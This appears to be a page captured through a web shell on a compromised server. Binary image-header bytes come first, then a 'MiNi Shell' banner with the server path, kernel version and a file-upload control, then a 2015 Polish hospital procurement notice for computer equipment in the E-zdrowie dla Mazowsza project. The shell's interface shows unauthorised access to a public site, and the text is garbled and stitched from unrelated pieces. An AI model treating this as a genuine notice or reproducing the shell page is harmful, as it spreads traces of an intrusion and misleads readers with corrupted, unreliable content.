JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150805/117015-N-2015.html

<p class="kh_header"><b>Warszawa: Zakup i dostawę sprzętu komputerowego i biurowego wraz z oprogramowaniem niezbędnych do realizacji projektu E-zdrowie dla Mazowsza dla Beneficjenta i Lidera Projektu MSB/PN/69/08/2015</b><br>
<b>Numer ogłoszenia: 117015 - 2015; data zamieszczenia: 05.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Mazowiecki Szpital Bródnowski w Warszawie Sp. z o.o. , ul. Ludwika Kondratowicza 8, 03-242 Warszawa, woj. mazowieckie, tel. 22 32 53 53, faks 22 326 58 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.brodnowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Osoba prawna świadcząca usługi o charakterze powszechnym.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawę sprzętu komputerowego i biurowego wraz z oprogramowaniem niezbędnych do realizacji projektu E-zdrowie dla Mazowsza dla Beneficjenta i Lidera Projektu MSB/PN/69/08/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa sprzętu komputerowego i biurowego wraz z oprogramowaniem niezbędnych do realizacji projektu E zdrowie dla Mazowsza dla Beneficjenta i Lidera Projektu, określonych w specyfikacji asortymentowo - cenowej stanowiącej załącznik nr 5 do SIWZ.
Mazowiecki Szpital Bródnowski Sp. z o.o. w Warszawie pełni funkcję lidera projektu E zdrowie dla Mazowsza realizowanego w ramach Priorytetu II Przyśpieszenie e Rozwoju Mazowsza dla działania 2.1 Przeciwdziałanie wykluczeniu informacyjnemu Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013.
Celem projektu E zdrowie dla Mazowsza jest dostosowanie podmiotów leczniczych dla których Samorząd Województwa Mazowieckiego jest podmiotem tworzącym bądź właścicielem do wymogów ustawy z dnia 28 kwietnia 2011 r. o systemie informacji w ochronie zdrowia (Dz. U. Nr 113, poz. 657 i Nr 174, poz. 1039). Rozbudowa ma na celu bezpieczne i zgodne z prawem wytwarzanie, przechowywanie, przekazywanie dokumentów medycznych pomiędzy jednostkami oraz integrację z tworzoną na szczeblu krajowym Elektroniczną Platformą Gromadzenia Informacji o Zdarzeniach Medycznych P1.
Drugim celem projektu jest stworzenie Centrum Analiz Statystyczno-Ekonomicznych, co wiąże się z zakupem i wdrożeniem odpowiedniego programu zarządczego, umożliwiającego tworzenie opracowań statystycznych na potrzeby nadzoru merytorycznego sprawowanego przez Samorząd Województwa nad jednostkami, dla których jest organem tworzącym lub właścicielem. Na chwilę obecną nadzór ten sprawowany jest poprzez analizę danych przekazywanych przez jednostki w formie papierowej i obejmuje większy zakres danych niż raporty dla Ministerstwa Zdrowia, GUS i NFZ. Pakiet zarządczy umożliwi Samorządowi sprawniejszy nadzór nad jednostkami zależnymi, co w konsekwencji przełoży się na korzyści w sferze planowania strategicznego rozwoju służby zdrowia na terenie województwa mazowieckiego, wpłynie pozytywnie na gospodarkę finansową, ostatecznie przyczyni się do poprawy jakości usług medycznych.
Cele szczegółowe:
1 Dostosowanie systemów informatycznych w szpitalach do obsługi elektronicznej dokumentacji medycznej zgodnie z wymogami ustawy z dnia 28 kwietnia 2011 r. o systemie informacji w ochronie zdrowia (Dz. U. Nr 113, poz. 657 i Nr 174, poz. 1039).
2	Wzrost liczby mieszkańców wykorzystujących Internet do komunikacji z lekarzem uzyskania informacji na temat opieki zdrowotnej.
3	Poprawa bezpieczeństwa danych znajdujących się w obszarze opieki zdrowotnej.
4	Wdrożenie nowoczesnych technologii ICT dla personelu medycznego wykorzystującego technologie informatyczne w codziennej pracy.
5	Monitorowanie przez samorząd województwa dostępności do świadczeń medycznych w podległych szpitalach oraz innych danych istotnych dla utrzymania istniejącej infrastruktury medycznej i poziomu świadczonych usług medycznych.
6	Wzrost liczby osób korzystających z usług on line w zakresie informacji na temat opieki zdrowotnej.
Cele projektu zostaną osiągnięte poprzez:
1	zakup sprzętu komputerowego, który uzupełni lub zastąpi przestarzały sprzęt w jednostkach,
2	wyposażenie jednostek w łącza internetowe zapewniające pełną wymianę danych medycznych między jednostkami służby zdrowia,
3	uzupełnienie i wyposażenie jednostek w niezbędne systemy informatyczne umożliwiające dokumentowanie zdarzeń medycznych zgodnie z Ustawą z dnia 28 kwietnia 2011 r. o systemie informacji w ochronie zdrowia,
4	prowadzenie elektronicznej dokumentacji medycznej zgodnie ze standardem HL 7 CDA, oraz jej wymianę zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 28 marca 2013 r.  w sprawie wymagań dla Systemu Informacji Medycznej (Dz.U. 2013 r. poz. 463),
5	stworzenie regionalnego archiwum elektronicznej dokumentacji medycznej, która zapewni efektywne wykorzystanie powyższych zadań,
6	zakup i wdrożenie odpowiedniego programu zarządczego umożliwiającego tworzenie opracowań statystycznych na potrzeby nadzoru merytorycznego sprawowanego przez Samorząd Województwa nad jednostkami, dla których jest organem tworzącym lub właścicielem.
W celu zapewnienia kompleksowego systemu e-zdrowie działającego na terenie Województwa, w projekcie udział wezmą 23 mazowieckie jednostki nadzorowane przez samorząd województwa - jednostki ochrony zdrowia, działające w formie samodzielnych publicznych zakładów opieki zdrowotnej, jak też działające w formie spółek prawa handlowego, dla których  podmiotem tworzącym właścicielem  jest Samorząd Województwa Mazowieckiego:
1.	Specjalistyczny Szpital Wojewódzki w Ciechanowie,
2.	Mazowiecki Szpital Specjalistyczny im. dr J. Psarskiego w Ostrołęce,
3.	Wojewódzki Szpital Zespolony w Płocku,
4.	Mazowiecki Szpital Specjalistyczny Spółka z ograniczoną odpowiedzialnością z siedzibą w Radomiu,
5.	Mazowiecki Szpital Wojewódzki w Siedlcach Sp. z o.o.
6.	Mazowiecki Szpital Bródnowski w Warszawie Sp. z o.o.
7.	Samodzielny Zespół Publicznych Zakładów Opieki Zdrowotnej im. Dzieci Warszawy 
w Dziekanowie Leśnym,
8.	Szpital Dziecięcy im. prof. dr med. Jana Bogdanowicza Samodzielny Publiczny Zakład Opieki Zdrowotnej w Warszawie,
9.	SPZOZ Wojewódzki Szpital Zakaźny w Warszawie,
10.	Wojewódzki Samodzielny Zespół Publicznych Zakładów Opieki Zdrowotnej 
im. prof. dr E. Wilczkowskiego w Gostyninie,
11.	Mazowieckie Specjalistyczne Centrum Zdrowia im. prof. dr Jana Mazurkiewicza w Pruszkowie,
12.	Samodzielny Wojewódzki Publiczny Zespół Zakładów Psychiatrycznej Opieki Zdrowotnej im. dr Barbary Borzym w Radomiu,
13.	Samodzielny Wojewódzki Zespół Publicznych Zakładów Psychiatrycznej Opieki Zdrowotnej 
w Warszawie,
14.	Mazowieckie Centrum Psychiatrii Drewnica Spółka z ograniczoną odpowiedzialnością,
15.	Szpital Mazowiecki w Garwolinie Sp. z o.o.,
16.	Samodzielny Specjalistyczny Zespół Zakładów Opieki Zdrowotnej w Rudce,
17. 	Mazowieckie Centrum Leczenia Chorób Płuc i Gruźlicy w Otwocku,
18.	Centrum Leczniczo-Rehabilitacyjne i Medycyny Pracy ATTIS Sp. z ograniczoną odpowiedzialnością,
19. Wojewódzka Stacja Pogotowia Ratunkowego i Transportu Sanitarnego Meditrans SPZOZ 
w Warszawie,
20. 	Samodzielny Publiczny Zakład Opieki Zdrowotnej Wojewódzka Stacja Pogotowia Ratunkowego i Transportu Sanitarnego w Płocku,
21. 	Samodzielny Publiczny Zakład Opieki Zdrowotnej Meditrans Ostrołęka Stacja Pogotowia Ratunkowego I Transportu Sanitarnego w Ostrołęce,
22. 	Samodzielny Publiczny Zakład Opieki Zdrowotnej RM-Meditrans Stacja Pogotowia Ratunkowego i Transportu Sanitarnego w Siedlcach,
23.Mazowieckie Centrum Rehabilitacji STOCER Sp. z o.o.
Lokalizacja projektu:
Projekt realizowany będzie w 12 miastach województwa mazowieckiego:
- Warszawie, 
- Siedlcach
- Radomiu
- Ciechanowie
- Płocku
- Ostrołęce,
- Otwocku,
- Garwolinie
- Gostyninie
- Konstancinie - Jeziornie
- Pruszkowie
- Ząbkach.
Ponadto projekt realizowany będzie także na terenie gminy Łomianki w Dziekanowie Leśnym oraz 
w gminie Mrozy w miejscowości Rudka.
W ramach realizacji niniejszego zamówienia przewidziany jest zakup i dostawa sprzętu komputerowego i biurowego wraz z oprogramowaniem, niezbędnych do realizacji projektu  E-zdrowie dla Mazowsza dla Beneficjenta i Lidera Projektu, które pozwolą na osiągnięcie celów projektu E-Zdrowie dla Mazowsza. Wykonawca dostarczy do lokalizacji Zamawiających, zainstaluje, skonfiguruje i uruchomi Sprzęt i Oprogramowanie, dla których szczegółowe wymagania opisano w Załączniku nr 8 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa minimalnych wymagań spełnienia w/w warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa minimalnych wymagań spełnienia w/w warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa minimalnych wymagań spełnienia w/w warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa minimalnych wymagań spełnienia w/w warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa minimalnych wymagań spełnienia w/w warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Karty katalogowe producenta lub autoryzowanego przedstawiciela producenta  wraz  z opisami technicznymi w języku polskim dla: komputera przenośnego (Ultrabook), Komputera przenośnego (Laptop), niszczarki, urządzenia wielofunkcyjnego 1, urządzenia wielofunkcyjnego 2, urządzenia wielofunkcyjnego 3, skanera ręcznego . Zamawiający dopuszcza karty w języku angielskim wraz z opisami technicznymi  oferowanych urządzeń w języku polskim. Zamawiający wymaga w sposób czytelny wskazania lub zaznaczenia przez Wykonawcę w karacie katalogowej parametrów technicznych stanowiących odpowiedni odnośnik do wymagań zawartych w opisie przedmiotu zamówienia.
UWAGA: W przypadku w którym dokumenty o których mowa w pkt 9.7. nie zawierają danych pozwalających na weryfikację wszystkich wymagań określonych przez zamawiającego w opisie przedmiotu zamówienia Wykonawca zobowiązany jest dołączyć do oferty dodatkowo odrębne oświadczenie o spełnieniu danego wymagania przez oferowane urządzenie wg. wzoru stanowiącego załącznik nr 9 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy - wg wzoru stanowiącego załącznik nr 3 do SIWZ. 
2. Wypełniona specyfikacja asortymentowo- cenowa - wg  wzoru  stanowiącego  załącznik nr 5 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji na dostarczony sprzęt i oprogramowanie - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidują możliwość zmian postanowień zawartej umowy w stosunku  do treści oferty, na podstawie której dokonano wyboru Wykonawcy w  zakresie:
1)	w przypadku zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów prawa podatkowego, w zakresie determinowanym tymi zmianami,
2)	w przypadku działania siły wyższej, przez którą należy rozumieć zdarzenia zewnętrzne o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem Umowy, którego nie można uniknąć, ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, w zakresie determinowanym wystąpieniem siły wyższej,
3)	w przypadku zmian/wejścia w życie powszechnie obowiązujących przepisów prawa, w tym w szczególności przepisów wykonawczych zawierających regulacje z zakresu  e-zdrowia; zmiany w takim przypadku zostaną wprowadzone w zakresie koniecznym do dostosowania przedmiotu Umowy do obowiązującego stanu prawnego,
4)	zmiany Umowy w przypadku zmian podmiotowych stron Umowy w wyniku przekształcenia podmiotowego (następstwa prawnego),
5)	zmiany w zakresie oferowanego przedmiotu umowy poprzez zaproponowanie sprzętu innego producenta lecz o parametrach tożsamych lub lepszych lub tego samego, lecz o parametrach  lepszych w przypadku wycofania z produkcji lub innych przyczyn niezależnych od Wykonawcy uniemożliwiających realizację zamówienia, z zastrzeżeniem niezmienności ceny - po przedstawieniu przez wykonawcę dowodów uzasadniających konieczność dokonania zmiany; wprowadzenie w/w zmian będzie możliwe w zakresie nie powodującym zwiększenia wynagrodzenia Wykonawcy określonego w Umowie,
6)	korygowania oczywistych omyłek pisarskich i rachunkowych w treści Umowy.
Do dokonania zmiany wymagane jest zawarcie stosownego aneksu z zachowaniem formy pisemnej do umowy pod rygorem nieważności.
Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy prawo zamówień publicznych (mogą one zostać dokonane w drodze jednostronnego oświadczenia strony której danych zmiana dotyczy):
1)	zmiana danych kontaktowych, 
2)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego lub nr telefonu).
Zmiany treści Umowy wymienione w niniejszym rozdziale z inicjatywy Wykonawcy, dopuszczone będą wyłącznie pod warunkiem złożenia przez Wykonawcę pisemnego wniosku do Zamawiającego 2, w terminie 5 dni roboczych od powzięcia informacji o wystąpieniu podstaw zmiany Umowy. 
Postanowienia niniejszego rozdziału nie przyznają żadnej ze stron Umowy roszczenia o zawarcie aneksu do Umowy. 

Wykonawca zobowiązany jest do pisemnego powiadomienia Zamawiających o każdej możliwości opóźnienia wykonania przedmiotu Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.brodnowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Mazowiecki Szpital Bródnowski w Warszawie Sp. z o. o., ul. Kondratowicza 8, Dział Zamówień pokój nr 134 B, blok C..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2015 godzina 10:00, miejsce: Kancelaria Dziennik Podawczy (pokój nr 31 blok a) w Warszawie przy ul. Kondratowicza 8..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiającymi w niniejszym postępowaniu są: Zamawiający nr 1: Mazowiecki Szpital Bródnowski w Warszawie Spółka z ograniczoną odpowiedzialnością ul. Kondratowicza 8 03-242 Warszawa Tel. 022 326 53 53, faks 022 326 58 34, http: www.bip.brodnowski.pl e-mail: dzial.zamowien.publicznych@brodnowski.pl oraz Zamawiający nr 2: Województwo Mazowieckie z siedzibą w Warszawie, ul. Jagiellońska 26, 03-719 Warszawa, przy czym Zamawiający o numerze 2 reprezentowany jest przez Pełnomocnika w osobie Zamawiającego numer 1. Ilekroć w dokumentacji pojawiać się będzie odesłanie do Zamawiającego należy przez to rozumieć obu Zamawiających. Zamawiający o nr 1 działa jako pełnomocnik na podstawie zawartego przez Zamawiających porozumienia partnerskiego o numerze 9SZ-II2014 w dniu 12 lutego 2014 roku. Zamówienie realizowane jest w ramach projektu: E-zdrowie dla Mazowsza realizowanego w ramach Priorytetu II Przyśpieszenie e-Rozwoju Mazowsza dla działania 2.1 Przeciwdziałanie wykluczeniu informacyjnemu Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

